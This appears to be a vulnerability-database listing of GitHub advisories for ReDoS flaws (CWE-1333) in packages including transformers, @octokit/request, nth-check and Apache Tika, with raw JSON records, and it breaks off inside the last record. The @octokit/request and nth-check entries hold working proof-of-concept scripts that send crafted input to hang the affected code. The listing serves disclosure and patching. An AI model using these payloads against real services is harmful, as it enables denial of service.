Common Weakness Enumeration

CWE-1333

Allowed

Inefficient Regular Expression Complexity

Abstraction: Base · Status: Draft

The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.

724 vulnerabilities reference this CWE, most recent first.

GHSA-RCV9-QM8P-9P6J

Vulnerability from github – Published: 2025-09-14 18:30 – Updated: 2025-09-15 20:31
VLAI
Summary
Hugging Face Transformers library has Regular Expression Denial of Service
Details

A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically within the normalize_numbers() method of the EnglishNormalizer class. This vulnerability affects versions up to 4.52.4 and is fixed in version 4.53.0. The issue arises from the method's handling of numeric strings, which can be exploited using crafted input strings containing long sequences of digits, leading to excessive CPU consumption. This vulnerability impacts text-to-speech and number normalization tasks, potentially causing service disruption, resource exhaustion, and API vulnerabilities.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "transformers"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.53.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-6051"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-15T20:31:45Z",
    "nvd_published_at": "2025-09-14T17:15:34Z",
    "severity": "MODERATE"
  },
  "details": "A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically within the `normalize_numbers()` method of the `EnglishNormalizer` class. This vulnerability affects versions up to 4.52.4 and is fixed in version 4.53.0. The issue arises from the method\u0027s handling of numeric strings, which can be exploited using crafted input strings containing long sequences of digits, leading to excessive CPU consumption. This vulnerability impacts text-to-speech and number normalization tasks, potentially causing service disruption, resource exhaustion, and API vulnerabilities.",
  "id": "GHSA-rcv9-qm8p-9p6j",
  "modified": "2025-09-15T20:31:45Z",
  "published": "2025-09-14T18:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6051"
    },
    {
      "type": "WEB",
      "url": "https://github.com/huggingface/transformers/pull/38844"
    },
    {
      "type": "WEB",
      "url": "https://github.com/huggingface/transformers/commit/54a02160eb030da9be18231c77791f2eb3a52216"
    },
    {
      "type": "WEB",
      "url": "https://github.com/huggingface/transformers/commit/ba8eaba9865618253f997784aa565b96206426f0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/huggingface/transformers"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/af929523-7b59-418a-bf55-301830b2ac9d"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hugging Face Transformers library has Regular Expression Denial of Service"
}

GHSA-RF8J-95H8-VRRR

Vulnerability from github – Published: 2023-06-29 03:30 – Updated: 2024-04-04 05:16
VLAI
Details

Mailform Pro CGI 4.3.1.2 and earlier allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-32610"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-29T01:15:50Z",
    "severity": "HIGH"
  },
  "details": "Mailform Pro CGI 4.3.1.2 and earlier allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition.",
  "id": "GHSA-rf8j-95h8-vrrr",
  "modified": "2024-04-04T05:16:48Z",
  "published": "2023-06-29T03:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32610"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN70502982/index.html"
    },
    {
      "type": "WEB",
      "url": "https://www.synck.com/blogs/news/newsroom/detail_1686638620.html"
    },
    {
      "type": "WEB",
      "url": "https://www.synck.com/downloads/cgi-perl/mailformpro/feature_1361268679.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RGQX-226F-2XP4

Vulnerability from github – Published: 2022-09-21 00:00 – Updated: 2022-09-23 17:08
VLAI
Summary
steal Inefficient Regular Expression Complexity vulnerability via string variable
Details

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "steal"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-37259"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-09-21T21:08:23Z",
    "nvd_published_at": "2022-09-20T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js.",
  "id": "GHSA-rgqx-226f-2xp4",
  "modified": "2022-09-23T17:08:13Z",
  "published": "2022-09-21T00:00:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37259"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stealjs/steal/issues/1528"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/stealjs/steal"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54124"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L54129"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "steal Inefficient Regular Expression Complexity vulnerability via string variable"
}

GHSA-RHX6-C78J-4Q9W

Vulnerability from github – Published: 2024-12-05 22:40 – Updated: 2025-06-03 14:30
VLAI
Summary
path-to-regexp contains a ReDoS
Details

Impact

The regular expression that is vulnerable to backtracking can be generated in versions before 0.1.12 of path-to-regexp, originally reported in CVE-2024-45296

Patches

Upgrade to 0.1.12.

Workarounds

Avoid using two parameters within a single path segment, when the separator is not . (e.g. no /:a-:b). Alternatively, you can define the regex used for both parameters and ensure they do not overlap to allow backtracking.

References

  • https://github.com/advisories/GHSA-9wv6-86v2-598j
  • https://blakeembrey.com/posts/2024-09-web-redos/
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "path-to-regexp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-52798"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-12-05T22:40:47Z",
    "nvd_published_at": "2024-12-05T23:15:06Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe regular expression that is vulnerable to backtracking can be generated in versions before 0.1.12 of `path-to-regexp`, originally reported in CVE-2024-45296\n\n### Patches\n\nUpgrade to 0.1.12.\n\n### Workarounds\n\nAvoid using two parameters within a single path segment, when the separator is not `.` (e.g. no `/:a-:b`). Alternatively, you can define the regex used for both parameters and ensure they do not overlap to allow backtracking.\n\n### References\n\n- https://github.com/advisories/GHSA-9wv6-86v2-598j\n- https://blakeembrey.com/posts/2024-09-web-redos/",
  "id": "GHSA-rhx6-c78j-4q9w",
  "modified": "2025-06-03T14:30:56Z",
  "published": "2024-12-05T22:40:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-rhx6-c78j-4q9w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52798"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pillarjs/path-to-regexp/commit/f01c26a013b1889f0c217c643964513acf17f6a4"
    },
    {
      "type": "WEB",
      "url": "https://blakeembrey.com/posts/2024-09-web-redos"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pillarjs/path-to-regexp"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20250124-0002"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "path-to-regexp contains a ReDoS"
}

GHSA-RJ29-J2G4-77Q8

Vulnerability from github – Published: 2024-03-18 20:39 – Updated: 2024-03-19 18:30
VLAI
Summary
[TagAwareCipher] - Decryption Failure (Regex Match)
Details

Impact

Vulnerability in SecureProps involves a regex failing to detect tags during decryption of encrypted data.

This occurs when the encrypted data has been encoded with NullEncoder and passed to TagAwareCipher, and contains special characters such as \n. As a result, the decryption process is skipped since the tags are not detected. This causes the encrypted data to be returned in plain format.

The vulnerability affects users who implement TagAwareCipher with any base cipher that has NullEncoder (not default).

Patches

The patch for the issue has been released. Users are advised to update to version 1.2.2.

Workarounds

The main recommendation is to update to the latest version as there are no breaking changes.

If that's not possible, you can use the default Base64Encoder with the base cipher decorated with TagAwareCipher to prevent special characters in the encrypted string from interfering with regex tag detection logic.

This workaround is safe but may involve double encoding since TagAwareCipher uses Base64Encoder by default.

References

Reported issue: https://github.com/IlicMiljan/Secure-Props/issues/20 Pull request resolving bug: https://github.com/IlicMiljan/Secure-Props/pull/21

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "ilicmiljan/secure-props"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.0"
            },
            {
              "fixed": "1.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-28864"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-18T20:39:00Z",
    "nvd_published_at": "2024-03-18T22:15:09Z",
    "severity": "LOW"
  },
  "details": "### Impact\n\nVulnerability in **SecureProps** involves a regex failing to detect tags during decryption of encrypted data. \n\nThis occurs when the encrypted data has been encoded with `NullEncoder` and passed to `TagAwareCipher`, and contains special characters such as `\\n`. As a result, the decryption process is skipped since the tags are not detected. This causes the encrypted data to be returned in plain format. \n\nThe vulnerability affects users who implement `TagAwareCipher` with any base cipher that has `NullEncoder` (not default).\n\n### Patches\n\nThe patch for the issue has been released. Users are advised to update to version **1.2.2**.\n\n### Workarounds\n\n**The main recommendation is to update to the latest version as there are no breaking changes.**\n\nIf that\u0027s not possible, you can use the default `Base64Encoder` with the base cipher decorated with `TagAwareCipher` to prevent special characters in the encrypted string from interfering with regex tag detection logic. \n\nThis workaround is safe but may involve double encoding since `TagAwareCipher` uses `Base64Encoder` by default.\n \n### References\n\nReported issue: https://github.com/IlicMiljan/Secure-Props/issues/20\nPull request resolving bug: https://github.com/IlicMiljan/Secure-Props/pull/21\n",
  "id": "GHSA-rj29-j2g4-77q8",
  "modified": "2024-03-19T18:30:48Z",
  "published": "2024-03-18T20:39:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/IlicMiljan/Secure-Props/security/advisories/GHSA-rj29-j2g4-77q8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28864"
    },
    {
      "type": "WEB",
      "url": "https://github.com/IlicMiljan/Secure-Props/issues/20"
    },
    {
      "type": "WEB",
      "url": "https://github.com/IlicMiljan/Secure-Props/pull/21"
    },
    {
      "type": "WEB",
      "url": "https://github.com/IlicMiljan/Secure-Props/commit/ab7b561040cd37fda3dbf9a6cab01fefcaa16627"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/IlicMiljan/Secure-Props"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "[TagAwareCipher] - Decryption Failure (Regex Match)"
}

GHSA-RMVR-2PP2-XJ38

Vulnerability from github – Published: 2025-02-14 18:00 – Updated: 2026-01-16 17:29
VLAI
Summary
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
Details

Summary

The regular expression /<([^>]+)>; rel="deprecation"/ used to match the link header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious link header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.

Details

The vulnerability resides in the regular expression /<([^>]+)>; rel="deprecation"/, which is used to match the link header in HTTP responses. This regular expression captures content between angle brackets (<>) followed by ; rel="deprecation". However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input. An attacker can exploit this vulnerability by sending a specially crafted link header designed to trigger excessive backtracking. For example, the following headers:

fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");

The crafted link header consists of 100,000 consecutive < characters followed by a closing >. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load. The issue is present in the following code:

const matches = responseHeaders.link && responseHeaders.link.match(/<([^>]+)>; rel="deprecation"/);

In this scenario, the link header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.

PoC

The gist of PoC.js 1. run npm i @octokit/request 2. run 'node poc.js' result: 3. then the program will stuck forever with high CPU usage

import { request } from "@octokit/request";
const originalFetch = globalThis.fetch;
globalThis.fetch = async (url, options) => {
  const response = await originalFetch(url, options);
  const fakeHeaders = new Headers(response.headers);
  fakeHeaders.set("link", "<".repeat(100000) + ">");
  fakeHeaders.set("deprecation", "true");
  return new Response(response.body, {
    status: response.status,
    statusText: response.statusText,
    headers: fakeHeaders
  });
};
request("GET /repos/octocat/hello-world")
  .then(response => {
    // console.log("[+] Response received:", response);
  })
  .catch(error => {
    // console.error("[-] Error:", error);
  });
// globalThis.fetch = originalFetch;

Impact

This is a Denial of Service (DoS) vulnerability caused by a ReDoS (Regular Expression Denial of Service) flaw. The vulnerability allows an attacker to craft a malicious link header that exploits the inefficient backtracking behavior of the regular expression used in the code. The primary impact is the potential for server resource exhaustion, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance. The vulnerability impacts any system that uses this specific regular expression to process link headers in HTTP responses. This can include: * Web applications or APIs that rely on parsing headers for deprecation information. * Users interacting with the affected service, as they may experience delays or outages if the server becomes overwhelmed. * Service providers who may face disruption in operations or performance degradation due to this flaw. If left unpatched, the vulnerability can be exploited by any unauthenticated user who is able to send a specially crafted HTTP request with a malicious link header, making it a low-barrier attack that could be exploited by anyone.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@octokit/request"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0-beta.1"
            },
            {
              "fixed": "9.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@octokit/request"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "8.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-25290"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-14T18:00:18Z",
    "nvd_published_at": "2025-02-14T20:15:35Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe regular expression `/\u003c([^\u003e]+)\u003e; rel=\"deprecation\"/` used to match the `link` header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex\u0027s matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious `link` header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.\n### Details\nThe vulnerability resides in the regular expression `/\u003c([^\u003e]+)\u003e; rel=\"deprecation\"/`, which is used to match the `link` header in HTTP responses. This regular expression captures content between angle brackets (`\u003c\u003e`) followed by `; rel=\"deprecation\"`. However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.\nAn attacker can exploit this vulnerability by sending a specially crafted `link` header designed to trigger excessive backtracking. For example, the following headers:\n```js\nfakeHeaders.set(\"link\", \"\u003c\".repeat(100000) + \"\u003e\");\nfakeHeaders.set(\"deprecation\", \"true\");\n```\nThe crafted `link` header consists of 100,000 consecutive `\u003c` characters followed by a closing `\u003e`. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.\nThe issue is present in the following code:\n```js\nconst matches = responseHeaders.link \u0026\u0026 responseHeaders.link.match(/\u003c([^\u003e]+)\u003e; rel=\"deprecation\"/);\n```\nIn this scenario, the `link` header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.\n\n### PoC\n[The gist of PoC.js](https://gist.github.com/ShiyuBanzhou/2afdabf0fc4cb6cfbd3b1d58b6082f6a)\n1. run npm i @octokit/request\n2. run \u0027node poc.js\u0027\nresult:\n3. then the program will stuck forever with high CPU usage\n```js\nimport { request } from \"@octokit/request\";\nconst originalFetch = globalThis.fetch;\nglobalThis.fetch = async (url, options) =\u003e {\n  const response = await originalFetch(url, options);\n  const fakeHeaders = new Headers(response.headers);\n  fakeHeaders.set(\"link\", \"\u003c\".repeat(100000) + \"\u003e\");\n  fakeHeaders.set(\"deprecation\", \"true\");\n  return new Response(response.body, {\n    status: response.status,\n    statusText: response.statusText,\n    headers: fakeHeaders\n  });\n};\nrequest(\"GET /repos/octocat/hello-world\")\n  .then(response =\u003e {\n    // console.log(\"[+] Response received:\", response);\n  })\n  .catch(error =\u003e {\n    // console.error(\"[-] Error:\", error);\n  });\n// globalThis.fetch = originalFetch;\n```\n### Impact\nThis is a *Denial of Service (DoS) vulnerability* caused by a *ReDoS (Regular Expression Denial of Service)* flaw. The vulnerability allows an attacker to craft a malicious `link` header that exploits the inefficient backtracking behavior of the regular expression used in the code.\nThe primary impact is the potential for *server resource exhaustion*, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.\nThe vulnerability impacts any system that uses this specific regular expression to process `link` headers in HTTP responses. This can include:\n* Web applications or APIs that rely on parsing headers for deprecation information.\n* Users interacting with the affected service, as they may experience delays or outages if the server becomes overwhelmed.\n* Service providers who may face disruption in operations or performance degradation due to this flaw.\nIf left unpatched, the vulnerability can be exploited by any unauthenticated user who is able to send a specially crafted HTTP request with a malicious `link` header, making it a low-barrier attack that could be exploited by anyone.",
  "id": "GHSA-rmvr-2pp2-xj38",
  "modified": "2026-01-16T17:29:36Z",
  "published": "2025-02-14T18:00:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/octokit/request.js/security/advisories/GHSA-rmvr-2pp2-xj38"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25290"
    },
    {
      "type": "WEB",
      "url": "https://github.com/octokit/request.js/commit/34ff07ee86fc5c20865982d77391bc910ef19c68"
    },
    {
      "type": "WEB",
      "url": "https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/octokit/request.js/commit/6bb29ba92a52f7bf94469c3433707c682c17126c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/octokit/request.js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/octokit/request.js/releases/tag/v8.4.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/octokit/request.js/releases/tag/v9.2.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking"
}

GHSA-RP65-9CF3-CJXR

Vulnerability from github – Published: 2021-09-20 20:47 – Updated: 2023-09-13 21:49
VLAI
Summary
Inefficient Regular Expression Complexity in nth-check
Details

There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.

The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i*10000)+"!";
    try {
        nthCheck.parse(attack_str) 
    }
    catch(err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
    }
}

The Output

attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nth-check"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-3803"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-09-20T20:15:09Z",
    "nvd_published_at": "2021-09-17T07:15:00Z",
    "severity": "HIGH"
  },
  "details": "There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.\n\nThe ReDoS vulnerabilities of the regex are mainly due to the sub-pattern `\\s*(?:([+-]?)\\s*(\\d+))?` with quantified overlapping adjacency and can be exploited with the following code.\n\n**Proof of Concept**\n```js\n// PoC.js\nvar nthCheck = require(\"nth-check\")\nfor(var i = 1; i \u003c= 50000; i++) {\n    var time = Date.now();\n    var attack_str = \u00272n\u0027 + \u0027 \u0027.repeat(i*10000)+\"!\";\n    try {\n        nthCheck.parse(attack_str) \n    }\n    catch(err) {\n        var time_cost = Date.now() - time;\n        console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\n    }\n}\n```\n\n**The Output**\n```\nattack_str.length: 10003: 174 ms\nattack_str.length: 20003: 1427 ms\nattack_str.length: 30003: 2602 ms\nattack_str.length: 40003: 4378 ms\nattack_str.length: 50003: 7473 ms\n```",
  "id": "GHSA-rp65-9cf3-cjxr",
  "modified": "2023-09-13T21:49:54Z",
  "published": "2021-09-20T20:47:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3803"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fb55/nth-check"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Inefficient Regular Expression Complexity in nth-check"
}

GHSA-RPJM-422R-95MH

Vulnerability from github – Published: 2022-05-17 00:00 – Updated: 2025-09-02 22:23
VLAI
Summary
Regular expression denial of service in apache tika
Details

In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler.

This was originally fixed in 1.28.2 and 2.4.0. While the fix in version 2.4.0 was complete, the fix for the 1.x branch wasn't incorporated until version 1.28.3. Please see GHSA-qw3f-w4pf-jh5f for more information.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.tika:tika-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.17"
            },
            {
              "fixed": "1.28.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.tika:tika-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-30126"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-05-25T19:29:25Z",
    "nvd_published_at": "2022-05-16T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler.\n\nThis was originally fixed in 1.28.2 and 2.4.0. While the fix in version 2.4.0 was complete, the fix for the 1.x branch wasn\u0027t incorporated until version 1.28.3. Please see GHSA-qw3f-w4pf-jh5f for more information.",
  "id": "GHSA-rpjm-422r-95mh",
  "modified": "2025-09-02T22:23:08Z",
  "published": "2022-05-17T00:00:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30126"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/tika/commit/83b0de4d60161ebd4bc224141a959ac8c18d95f4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/tika/commit/a36711610fa1f6f5ba0f594803415af795e0b265"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/tika/commit/e76302196ebcafb7b51fce37fbe8256e6c0fbc51"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-qw3f-w4pf-jh5f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/tika"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/dh3syg68nxogbmlg13srd6gjn3h2z6r4"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220624-0004"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/05/16/3"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/05/31/2"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2022/06/27/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Regular expression denial of service in apache tika"
}

GHSA-RQ2Q-4R55-9877

Vulnerability from github – Published: 2026-04-14 23:13 – Updated: 2026-04-27 15:02
VLAI
Summary
Giskard has a Regular Expression Denial of Service (ReDoS) in RegexMatching Check
Details

Summary

The RegexMatching check in the giskard-checks package passes a user-supplied regular expression pattern directly to Python's re.search() without any timeout, complexity guard, or pattern validation. An attacker who can control the regex pattern or the text being matched can craft inputs that trigger catastrophic backtracking in the regex engine, causing the process to hang indefinitely and denying service to all other operations.

giskard-checks is a local developer testing library. Check definitions, including the pattern parameter, are provided in application code or configuration files and executed locally. Exploitation requires write access to a check definition and subsequent execution of the test suite. The absence of a regex timeout could cause availability issues in automated environments such as CI/CD pipelines.

Affected component

text_matching.py, line 457: re.search(pattern, text)

Remediation

Upgrade to giskard-checks >= 1.0.2b1.

Credit

Giskard-AI thanks @dhabaleshwar for identifying the missing timeout on regex evaluation.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.1b1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "giskard-checks"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2b1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40319"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T23:13:39Z",
    "nvd_published_at": "2026-04-17T18:16:32Z",
    "severity": "LOW"
  },
